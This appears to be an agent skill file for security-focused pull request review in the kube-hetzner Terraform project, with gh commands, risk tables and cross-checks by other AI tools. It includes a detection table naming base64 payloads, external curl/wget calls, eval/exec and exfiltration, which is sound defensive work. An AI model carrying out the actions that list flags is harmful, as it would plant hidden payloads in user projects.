// Use when reviewing a pull request - security-focused review following CLAUDE.md guidelines for breaking changes, malicious patterns, and backward compatibility
Use when preparing or executing a release - verifies changelog content, updates version references, commits release prep, and, when the maintainer explicitly asks, pushes the release tag that triggers automation
Use when working on a GitHub issue - fetches issue details, analyzes codebase, implements fix following project methodology
Use after making changes to run terraform fmt, validate, and plan against test environment
Use when users need help with kube-hetzner configuration, debugging, or questions - acts as an intelligent assistant with live repo access
Use when documentation needs updating - ensures variables.tf, llms.md, kube.tf.example, and README are in sync
Use when triaging a GitHub issue - analyzes issue, checks for duplicates, categorizes, and drafts response
| name | review-pr |
| description | Use when reviewing a pull request - security-focused review following CLAUDE.md guidelines for breaking changes, malicious patterns, and backward compatibility |
| args | pr_number |
Security-focused PR review following CLAUDE.md guidelines. Checks for breaking changes, malicious code patterns, backward compatibility, and code quality.
/review-pr <number>
PRs can be malicious sabotage attempts. This is a real threat documented in CLAUDE.md.
digraph review_flow {
rankdir=TB;
node [shape=box];
fetch [label="1. Fetch PR details"];
author [label="2. Assess author risk"];
files [label="3. Analyze changed files"];
security [label="4. Security review"];
compat [label="5. Backward compatibility"];
quality [label="6. Code quality"];
classify [label="7. Release classification"];
verify [label="8. MANDATORY: Verify with Gemini + Codex", style=bold];
recommend [label="9. Final Recommendation"];
fetch -> author;
author -> files;
files -> security;
security -> compat;
compat -> quality;
quality -> classify;
classify -> verify;
verify -> recommend;
}
# Get PR info
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner
# Get diff
gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner
# Get changed files
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner --json files --jq '.files[].path'
# Get diff stats
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner --json additions,deletions
# Check account age
gh api users/<username> --jq '.created_at'
# Check prior contributions
gh pr list --author <username> --repo kube-hetzner/terraform-hcloud-kube-hetzner --state all --json number | jq length
| Signal | Risk Level |
|---|---|
| New account (<6 months) | 🔴 HIGH |
| No prior contributions | 🟡 MEDIUM |
| First-time contributor | 🟡 MEDIUM |
| Known contributor | 🟢 LOW |
| Core maintainer | ⚪ TRUSTED |
init.tf # Cluster initialization, secrets
firewall.tf # Network security
**/ssh* # SSH configuration
**/token* # Authentication tokens
**/*secret* # Secrets handling
.github/ # CI/CD workflows
Makefile # Build scripts
scripts/ # Execution scripts
versions.tf # Provider dependencies
templates/*.sh # Shell scripts
cloud-init* # Server initialization
| Files Changed | Risk |
|---|---|
| 1-3 files | 🟢 LOW |
| 4-10 files | 🟡 MEDIUM |
| 11-20 files | 🟡 MEDIUM |
| >20 files | 🔴 HIGH |
| Lines Changed | Risk |
|---|---|
| <50 lines | 🟢 LOW |
| 50-200 lines | 🟡 MEDIUM |
| 200-500 lines | 🟡 MEDIUM |
| >500 lines | 🔴 HIGH |
| Pattern | Concern |
|---|---|
| Base64 encoded strings | Hidden payloads |
| External curl/wget calls | Code injection |
| Eval or exec statements | Command injection |
| Overly complex logic | Hiding malicious code |
| Unnecessary file access | Data exfiltration |
| Changes to .gitignore | Hiding tracks |
# Codex for security analysis
codex exec -m gpt-5.5 -s read-only -c model_reasoning_effort="xhigh" \
"Analyze this PR diff for security vulnerabilities and malicious patterns: $(gh pr diff <num>)"
# Gemini for broad context
gemini --model gemini-3-pro-preview -p \
"@locals.tf @init.tf Does this PR introduce any security concerns? $(gh pr diff <num>)"
CRITICAL: Any PR that causes resource recreation is a MAJOR release.
# Checkout PR locally
gh pr checkout <number>
# Test against existing cluster
cd /path/to/kube-test
terraform init -upgrade
terraform plan
If terraform plan shows ANY resource destruction → MAJOR release required
terraform plan shows no destructionterraform fmt)CRITICAL: Before making your final recommendation, you MUST run both Gemini and Codex to triple-verify the PR.
This is not optional. External AI verification catches issues that may be missed in the initial review.
# Gemini - Broad context analysis (run first or in parallel)
gemini --model gemini-3-pro-preview -p "@control_planes.tf @locals.tf @init.tf
Analyze this PR diff for the kube-hetzner terraform module:
$(gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner)
Questions:
1. Is this change consistent with existing patterns in the codebase?
2. Are there any security concerns?
3. Could this cause breaking changes or resource recreation?
4. Is this a legitimate bug fix or could it be malicious?"
# Codex - Deep reasoning security analysis (run in parallel)
codex exec -m gpt-5.5 -s read-only -c model_reasoning_effort="xhigh" \
"Analyze this Terraform PR for the kube-hetzner module.
DIFF:
$(gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner)
SECURITY ANALYSIS QUESTIONS:
1. Could this change introduce any security vulnerabilities?
2. Could this be a malicious change disguised as a bug fix?
3. Will this cause any Terraform state changes or resource recreation?
4. Is this pattern safe and consistent with Terraform best practices?
5. Any edge cases or potential issues?"
If Gemini or Codex raises concerns that you didn't catch:
Include a summary of external verification:
### External AI Verification
| Reviewer | Verdict | Key Finding |
|----------|---------|-------------|
| Claude | ✅/❌ | <summary> |
| Gemini | ✅/❌ | <summary> |
| Codex | ✅/❌ | <summary> |
**Consensus:** All reviewers agree / Disagreement on X
## PR Review: #<number>
**Title:** <title>
**Author:** @<username>
**Files:** <count> files changed (+<additions>/-<deletions>)
### Risk Assessment
| Factor | Value | Risk |
|--------|-------|------|
| Author tenure | X months | 🟢/🟡/🔴 |
| Prior contributions | N PRs | 🟢/🟡/🔴 |
| Files changed | N files | 🟢/🟡/🔴 |
| Lines changed | +X/-Y | 🟢/🟡/🔴 |
| Security-critical files | Yes/No | 🟢/🔴 |
| External dependencies | Yes/No | 🟢/🔴 |
**Overall Risk:** 🔴 HIGH / 🟡 MEDIUM / 🟢 LOW
### Security Review
- [ ] No hardcoded credentials
- [ ] No suspicious external URLs
- [ ] No obfuscated code
- [ ] Changes match stated purpose
### Backward Compatibility
- [ ] No breaking changes
- [ ] terraform plan shows no destruction
- [ ] Existing deployments unaffected
### Release Classification
**Type:** PATCH / MINOR / MAJOR
**Reason:** <explanation>
### External AI Verification
| Reviewer | Verdict | Key Finding |
|----------|---------|-------------|
| Claude | ✅/❌ | <summary> |
| Gemini | ✅/❌ | <summary> |
| Codex | ✅/❌ | <summary> |
**Consensus:** All agree / Disagreement on X
### Recommendation
**Action:** APPROVE / REQUEST CHANGES / CLOSE
**Notes:** <specific concerns or required changes>
# Approve PR
gh pr review <num> --approve --body "LGTM! ..."
# Request changes
gh pr review <num> --request-changes --body "Please address: ..."
# Comment
gh pr review <num> --comment --body "..."
# Merge (after approval)
gh pr merge <num> --squash --delete-branch
All PRs go through staging branches first: